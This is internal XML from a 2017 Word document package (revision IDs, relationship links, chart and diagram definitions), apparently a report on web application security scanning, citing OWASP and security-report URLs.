    <w:rsid w:val="00ED2730"/>
    <w:rsid w:val="00ED2946"/>
    <w:rsid w:val="00ED29C5"/>
    <w:rsid w:val="00ED2B5C"/>
    <w:rsid w:val="00ED2DD1"/>
    <w:rsid w:val="00ED2F53"/>
    <w:rsid w:val="00ED2FAF"/>
    <w:rsid w:val="00ED31B9"/>
    <w:rsid w:val="00ED3505"/>
    <w:rsid w:val="00ED388F"/>
    <w:rsid w:val="00ED3A66"/>
    <w:rsid w:val="00ED4036"/>
    <w:rsid w:val="00ED5122"/>
    <w:rsid w:val="00ED5127"/>
    <w:rsid w:val="00ED54A6"/>
    <w:rsid w:val="00ED56A3"/>
    <w:rsid w:val="00ED5C17"/>
    <w:rsid w:val="00ED5C7E"/>
    <w:rsid w:val="00ED5DB3"/>
    <w:rsid w:val="00ED5FC4"/>
    <w:rsid w:val="00ED600D"/>
    <w:rsid w:val="00ED61CF"/>
    <w:rsid w:val="00ED6282"/>
    <w:rsid w:val="00ED646E"/>
    <w:rsid w:val="00ED6652"/>
    <w:rsid w:val="00ED66CE"/>
    <w:rsid w:val="00ED70C3"/>
    <w:rsid w:val="00ED77C4"/>
    <w:rsid w:val="00ED79DE"/>
    <w:rsid w:val="00ED7AB2"/>
    <w:rsid w:val="00ED7C9D"/>
    <w:rsid w:val="00ED7ECD"/>
    <w:rsid w:val="00EE0736"/>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11D"/>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0BB"/>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0F7"/>
    <w:rsid w:val="00EF04F1"/>
    <w:rsid w:val="00EF08D2"/>
    <w:rsid w:val="00EF0F20"/>
    <w:rsid w:val="00EF1BFD"/>
    <w:rsid w:val="00EF1DBF"/>
    <w:rsid w:val="00EF1E45"/>
    <w:rsid w:val="00EF2056"/>
    <w:rsid w:val="00EF213E"/>
    <w:rsid w:val="00EF23C3"/>
    <w:rsid w:val="00EF23FF"/>
    <w:rsid w:val="00EF24AD"/>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6FF9"/>
    <w:rsid w:val="00EF7135"/>
    <w:rsid w:val="00EF7470"/>
    <w:rsid w:val="00EF79AD"/>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4F"/>
    <w:rsid w:val="00F03C6A"/>
    <w:rsid w:val="00F03E20"/>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5C1"/>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348"/>
    <w:rsid w:val="00F1252D"/>
    <w:rsid w:val="00F12988"/>
    <w:rsid w:val="00F12D3B"/>
    <w:rsid w:val="00F13B86"/>
    <w:rsid w:val="00F13F9C"/>
    <w:rsid w:val="00F1427D"/>
    <w:rsid w:val="00F14544"/>
    <w:rsid w:val="00F1463F"/>
    <w:rsid w:val="00F14D06"/>
    <w:rsid w:val="00F14FD5"/>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AD2"/>
    <w:rsid w:val="00F21B74"/>
    <w:rsid w:val="00F21CF7"/>
    <w:rsid w:val="00F21CF8"/>
    <w:rsid w:val="00F221E0"/>
    <w:rsid w:val="00F2242C"/>
    <w:rsid w:val="00F22450"/>
    <w:rsid w:val="00F22498"/>
    <w:rsid w:val="00F22B90"/>
    <w:rsid w:val="00F22C65"/>
    <w:rsid w:val="00F22DB1"/>
    <w:rsid w:val="00F22E2B"/>
    <w:rsid w:val="00F22EA8"/>
    <w:rsid w:val="00F22EFA"/>
    <w:rsid w:val="00F23152"/>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BB9"/>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3F5"/>
    <w:rsid w:val="00F27492"/>
    <w:rsid w:val="00F27830"/>
    <w:rsid w:val="00F27892"/>
    <w:rsid w:val="00F27919"/>
    <w:rsid w:val="00F27A73"/>
    <w:rsid w:val="00F27CCD"/>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BC5"/>
    <w:rsid w:val="00F34D41"/>
    <w:rsid w:val="00F34D90"/>
    <w:rsid w:val="00F34FAA"/>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24"/>
    <w:rsid w:val="00F36877"/>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369"/>
    <w:rsid w:val="00F4276A"/>
    <w:rsid w:val="00F427A8"/>
    <w:rsid w:val="00F42980"/>
    <w:rsid w:val="00F42B59"/>
    <w:rsid w:val="00F42CDA"/>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02"/>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5C5"/>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1DAE"/>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E00"/>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6DED"/>
    <w:rsid w:val="00F6720F"/>
    <w:rsid w:val="00F6756D"/>
    <w:rsid w:val="00F67753"/>
    <w:rsid w:val="00F67BEF"/>
    <w:rsid w:val="00F67D19"/>
    <w:rsid w:val="00F67E77"/>
    <w:rsid w:val="00F70123"/>
    <w:rsid w:val="00F701C8"/>
    <w:rsid w:val="00F701D2"/>
    <w:rsid w:val="00F70248"/>
    <w:rsid w:val="00F70381"/>
    <w:rsid w:val="00F7052C"/>
    <w:rsid w:val="00F7060C"/>
    <w:rsid w:val="00F7089B"/>
    <w:rsid w:val="00F70964"/>
    <w:rsid w:val="00F71016"/>
    <w:rsid w:val="00F7161A"/>
    <w:rsid w:val="00F71AFA"/>
    <w:rsid w:val="00F71BF4"/>
    <w:rsid w:val="00F71C6B"/>
    <w:rsid w:val="00F71D32"/>
    <w:rsid w:val="00F71E58"/>
    <w:rsid w:val="00F72625"/>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B62"/>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CC9"/>
    <w:rsid w:val="00F83E53"/>
    <w:rsid w:val="00F8425D"/>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39"/>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07E"/>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657"/>
    <w:rsid w:val="00FA7A2B"/>
    <w:rsid w:val="00FA7BF4"/>
    <w:rsid w:val="00FA7D89"/>
    <w:rsid w:val="00FB0528"/>
    <w:rsid w:val="00FB074F"/>
    <w:rsid w:val="00FB0A4E"/>
    <w:rsid w:val="00FB0B84"/>
    <w:rsid w:val="00FB0DF6"/>
    <w:rsid w:val="00FB1470"/>
    <w:rsid w:val="00FB14D3"/>
    <w:rsid w:val="00FB17D4"/>
    <w:rsid w:val="00FB1B77"/>
    <w:rsid w:val="00FB1DA3"/>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293"/>
    <w:rsid w:val="00FC6702"/>
    <w:rsid w:val="00FC6A0E"/>
    <w:rsid w:val="00FC6BDE"/>
    <w:rsid w:val="00FC6BE2"/>
    <w:rsid w:val="00FC6D67"/>
    <w:rsid w:val="00FC704B"/>
    <w:rsid w:val="00FC70A3"/>
    <w:rsid w:val="00FC712F"/>
    <w:rsid w:val="00FC7402"/>
    <w:rsid w:val="00FC7C23"/>
    <w:rsid w:val="00FC7D8E"/>
    <w:rsid w:val="00FC7E08"/>
    <w:rsid w:val="00FC7E81"/>
    <w:rsid w:val="00FD002D"/>
    <w:rsid w:val="00FD01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1C"/>
    <w:rsid w:val="00FD4FA5"/>
    <w:rsid w:val="00FD501A"/>
    <w:rsid w:val="00FD5028"/>
    <w:rsid w:val="00FD52F2"/>
    <w:rsid w:val="00FD54E1"/>
    <w:rsid w:val="00FD5517"/>
    <w:rsid w:val="00FD5578"/>
    <w:rsid w:val="00FD5589"/>
    <w:rsid w:val="00FD5BDC"/>
    <w:rsid w:val="00FD5E00"/>
    <w:rsid w:val="00FD639F"/>
    <w:rsid w:val="00FD689F"/>
    <w:rsid w:val="00FD6933"/>
    <w:rsid w:val="00FD69A3"/>
    <w:rsid w:val="00FD69F0"/>
    <w:rsid w:val="00FD6E1D"/>
    <w:rsid w:val="00FD6EA7"/>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3F0"/>
    <w:rsid w:val="00FE14C5"/>
    <w:rsid w:val="00FE1735"/>
    <w:rsid w:val="00FE1784"/>
    <w:rsid w:val="00FE189E"/>
    <w:rsid w:val="00FE208A"/>
    <w:rsid w:val="00FE20CD"/>
    <w:rsid w:val="00FE2268"/>
    <w:rsid w:val="00FE29E4"/>
    <w:rsid w:val="00FE2A84"/>
    <w:rsid w:val="00FE2D29"/>
    <w:rsid w:val="00FE2E49"/>
    <w:rsid w:val="00FE2F14"/>
    <w:rsid w:val="00FE38C3"/>
    <w:rsid w:val="00FE3973"/>
    <w:rsid w:val="00FE3B92"/>
    <w:rsid w:val="00FE3CD5"/>
    <w:rsid w:val="00FE3D96"/>
    <w:rsid w:val="00FE3F03"/>
    <w:rsid w:val="00FE4029"/>
    <w:rsid w:val="00FE4CAA"/>
    <w:rsid w:val="00FE50C7"/>
    <w:rsid w:val="00FE5209"/>
    <w:rsid w:val="00FE526A"/>
    <w:rsid w:val="00FE563D"/>
    <w:rsid w:val="00FE5F05"/>
    <w:rsid w:val="00FE616D"/>
    <w:rsid w:val="00FE6AA3"/>
    <w:rsid w:val="00FE6C64"/>
    <w:rsid w:val="00FE6C9B"/>
    <w:rsid w:val="00FE6DF0"/>
    <w:rsid w:val="00FE7016"/>
    <w:rsid w:val="00FE705D"/>
    <w:rsid w:val="00FE722B"/>
    <w:rsid w:val="00FE7456"/>
    <w:rsid w:val="00FE79C5"/>
    <w:rsid w:val="00FF0474"/>
    <w:rsid w:val="00FF0482"/>
    <w:rsid w:val="00FF05F2"/>
    <w:rsid w:val="00FF0681"/>
    <w:rsid w:val="00FF0BE6"/>
    <w:rsid w:val="00FF0CD9"/>
    <w:rsid w:val="00FF0FEC"/>
    <w:rsid w:val="00FF1322"/>
    <w:rsid w:val="00FF14C4"/>
    <w:rsid w:val="00FF173E"/>
    <w:rsid w:val="00FF1F5A"/>
    <w:rsid w:val="00FF210B"/>
    <w:rsid w:val="00FF26BC"/>
    <w:rsid w:val="00FF28BB"/>
    <w:rsid w:val="00FF2B5E"/>
    <w:rsid w:val="00FF2C63"/>
    <w:rsid w:val="00FF311D"/>
    <w:rsid w:val="00FF3661"/>
    <w:rsid w:val="00FF36DC"/>
    <w:rsid w:val="00FF374D"/>
    <w:rsid w:val="00FF3842"/>
    <w:rsid w:val="00FF4610"/>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9.png"/><Relationship Id="rId143" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image90.png"/><Relationship Id="rId144" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image91.png"/><Relationship Id="rId145" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image92.png"/><Relationship Id="rId146" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image93.png"/><Relationship Id="rId147" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image94.png"/><Relationship Id="rId148" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.testwebsite.nl/redirect.php?id=http://testlink.nl" TargetMode="External"/><Relationship Id="rId149" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image95.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eader" Target="header10.xml"/><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80" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header25.xml"/><Relationship Id="rId81" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header26.xml"/><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 Id="rId110" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header33.xml"/><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image" Target="media/image75.png"/><Relationship Id="rId114" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image76.png"/><Relationship Id="rId115" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image77.png"/><Relationship Id="rId116" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image78.png"/><Relationship Id="rId117" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image79.png"/><Relationship Id="rId118" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image80.png"/><Relationship Id="rId119" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image81.png"/><Relationship Id="rId150" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image96.png"/><Relationship Id="rId151" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/diagramData" Target="diagrams/data1.xml"/><Relationship Id="rId152" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/diagramLayout" Target="diagrams/layout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53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/diagramQuickStyle" Target="diagrams/quickStyle1.xml"/><Relationship Id="rId154" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/diagramColors" Target="diagrams/colors1.xml"/><Relationship Id="rId155" Type="http://schemas.microsoft.com/office/2007/relationships/diagramDrawing" Target="diagrams/drawing1.xml"/><Relationship Id="rId156" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header36.xml"/><Relationship Id="rId157" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header37.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header" Target="header11.xml"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header12.xml"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header13.xml"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header14.xml"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header15.xml"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header16.xml"/><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header" Target="header17.xml"/><Relationship Id="rId90" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image61.png"/><Relationship Id="rId91" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header27.xml"/><Relationship Id="rId92" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header28.xml"/><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120" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header34.xml"/><Relationship Id="rId121" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header35.xml"/><Relationship Id="rId122" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://sucuri.net/website-security/Reports/Sucuri-Website-Hacked-Report-2016Q1.pdf" TargetMode="External"/><Relationship Id="rId123" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://assets.documentcloud.org/documents/3527813/IBM-XForce-Index-2017-FINAL.pdf" TargetMode="External"/><Relationship Id="rId124" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://essextec.com/wp-content/uploads/2015/09/xforcereport2q2014.pdf" TargetMode="External"/><Relationship Id="rId125" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project" TargetMode="External"/><Relationship Id="rId126" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.sectoolmarket.com/price-and-feature-comparison-of-web-application-scanners-unified-list.html" TargetMode="External"/><Relationship Id="rId127" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://pc-en-internet.infonu.nl/geschiedenis/84250-het-web-web-10-web-20-web-30.html" TargetMode="External"/><Relationship Id="rId128" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Category:Vulnerability_Scanning_Tools" TargetMode="External"/><Relationship Id="rId129" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.acunetix.com/resources/wvsbrochure.pdf" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.png"/><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12.png"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/chart" Target="charts/chart1.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chart" Target="charts/chart2.xml"/><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footer" Target="footer1.xml"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header18.xml"/><Relationship Id="rId62" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer2.xm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header" Target="header19.xml"/><Relationship Id="rId66" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header20.xml"/><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130" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://torquemag.io/2016/10/13-surprising-wordpress-statistics-updated-2016/" TargetMode="External"/><Relationship Id="rId131" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://ithemes.com/2017/01/16/wordpress-security-issues/" TargetMode="External"/><Relationship Id="rId132" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.techempower.com/benchmarks/" TargetMode="External"/><Relationship Id="rId133" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.sitepoint.com/best-php-framework-2015-sitepoint-survey-results/" TargetMode="External"/><Relationship Id="rId134" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://projects.webappsec.org/w/page/13246978/Threat%20Classification" TargetMode="External"/><Relationship Id="rId135" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image82.png"/><Relationship Id="rId136" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image83.png"/><Relationship Id="rId137" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image84.png"/><Relationship Id="rId138" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image85.png"/><Relationship Id="rId139" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image86.png"/><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header" Target="header21.xml"/><Relationship Id="rId74" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header22.xml"/><Relationship Id="rId75" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image49.png"/><Relationship Id="rId76" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header23.xml"/><Relationship Id="rId77" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header24.xml"/><Relationship Id="rId78" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image51.png"/><Relationship Id="rId7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eader" Target="header29.xml"/><Relationship Id="rId101" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header30.xml"/><Relationship Id="rId102" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image69.png"/><Relationship Id="rId103" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image70.png"/><Relationship Id="rId104" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image71.png"/><Relationship Id="rId105" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header31.xml"/><Relationship Id="rId106" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header32.xml"/><Relationship Id="rId107" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:8000/active/" TargetMode="External"/><Relationship Id="rId108" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:8000/active/" TargetMode="External"/><Relationship Id="rId109" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7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87.png"/><Relationship Id="rId14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33.png"/></Relationships>
</file>

<file path=word/_rels/header12.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image33.png"/></Relationships>
</file>

<file path=word/_rels/header13.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image34.png"/></Relationships>
</file>

<file path=word/_rels/header14.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image35.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6.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image36.png"/></Relationships>
</file>

<file path=word/_rels/header17.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image34.png"/></Relationships>
</file>

<file path=word/_rels/header18.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image39.png"/></Relationships>
</file>

<file path=word/_rels/header19.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20.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4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50.png"/></Relationships>
</file>

<file path=word/_rels/header24.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image50.png"/></Relationships>
</file>

<file path=word/_rels/header26.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52.png"/></Relationships>
</file>

<file path=word/_rels/header27.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image53.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image33.png"/></Relationships>
</file>

<file path=word/_rels/header29.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image50.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image33.png"/></Relationships>
</file>

<file path=word/_rels/header30.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3.png"/></Relationships>
</file>

<file path=word/_rels/header31.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33.png"/></Relationships>
</file>

<file path=word/_rels/header32.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33.png"/></Relationships>
</file>

<file path=word/_rels/header33.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33.png"/></Relationships>
</file>

<file path=word/_rels/header34.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image33.png"/></Relationships>
</file>

<file path=word/_rels/header35.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image33.png"/></Relationships>
</file>

<file path=word/_rels/header36.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.png"/></Relationships>
</file>

<file path=word/_rels/header37.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6"/>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013776976"/>
        <c:axId val="2013778752"/>
      </c:barChart>
      <c:catAx>
        <c:axId val="201377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13778752"/>
        <c:crosses val="autoZero"/>
        <c:auto val="1"/>
        <c:lblAlgn val="ctr"/>
        <c:lblOffset val="100"/>
        <c:noMultiLvlLbl val="0"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="201377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1377697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6"/>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677623392"/>
        <c:axId val="2074835248"/>
        <c:axId val="0"/>
      </c:bar3DChart>
      <c:catAx>
        <c:axId val="1677623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4835248"/>
        <c:crosses val="autoZero"/>
        <c:auto val="1"/>
        <c:lblAlgn val="ctr"/>
        <c:lblOffset val="100"/>
        <c:noMultiLvlLbl val="0"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="2074835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7762339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D88C0A0B-C7D9-F54E-A7CB-B30C41433023}" type="presOf" srcId="{5985C6E8-CE07-4672-9F3F-D84B153659FD}" destId="{B53CC6F6-A64E-4B3D-8EAD-95266F2829A3}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron1"/>
    <dgm:cxn modelId="{0EDD50C9-A294-484D-B740-DEA3B9B12976}" type="presOf" srcId="{C6A8E34B-1349-4F6B-8319-F3472407ED06}" destId="{6BD701D1-071C-477D-9027-56FD635BB722}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron1"/>
    <dgm:cxn modelId="{FB13595F-D672-AF44-8259-7EA6D10CB98F}" type="presOf" srcId="{B0132A91-C8F5-4887-B8B2-69DB7F25D12F}" destId="{76B109A5-F6BB-43FA-9F60-1BB393259A2B}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron1"/>
    <dgm:cxn modelId="{0368CF82-9E26-7148-BAA2-2E6DC2044A07}"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06946AD5-41DD-1646-B0CA-3FA4B98E2C4B}" type="presParOf" srcId="{ABE776F4-8AE8-4DF9-8512-E805A6A9D583}" destId="{76B109A5-F6BB-43FA-9F60-1BB393259A2B}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron1"/>
    <dgm:cxn modelId="{52C73970-9DDF-F94C-B056-9FB3EC373721}" type="presParOf" srcId="{ABE776F4-8AE8-4DF9-8512-E805A6A9D583}" destId="{BF9F7A04-B148-4E67-A36A-8C8F217049A2}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron1"/>
    <dgm:cxn modelId="{9C2160F9-CE76-6C4E-9D79-310F07106B0F}" type="presParOf" srcId="{ABE776F4-8AE8-4DF9-8512-E805A6A9D583}" destId="{B53CC6F6-A64E-4B3D-8EAD-95266F2829A3}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron1"/>
    <dgm:cxn modelId="{97032377-CDB5-AC44-8750-E82689964EA6}" type="presParOf" srcId="{ABE776F4-8AE8-4DF9-8512-E805A6A9D583}" destId="{8E7F1419-364D-4B07-94AE-24C73C49376B}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron1"/>
    <dgm:cxn modelId="{05D4D8A6-BCEE-DC44-8533-C118410AB9BF}"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B475-8DB3-3142-8E6F-BB99FFD6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01</Pages>
  <Words>17662</Words>
  <Characters>100678</Characters>
  <Application>Microsoft Macintosh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479</cp:revision>
  <cp:lastPrinted>2017-10-19T09:08:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2017-10-17T13:26:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-10-22T10:16:00Z</dcterms:modified>
</cp:coreProperties>
</file>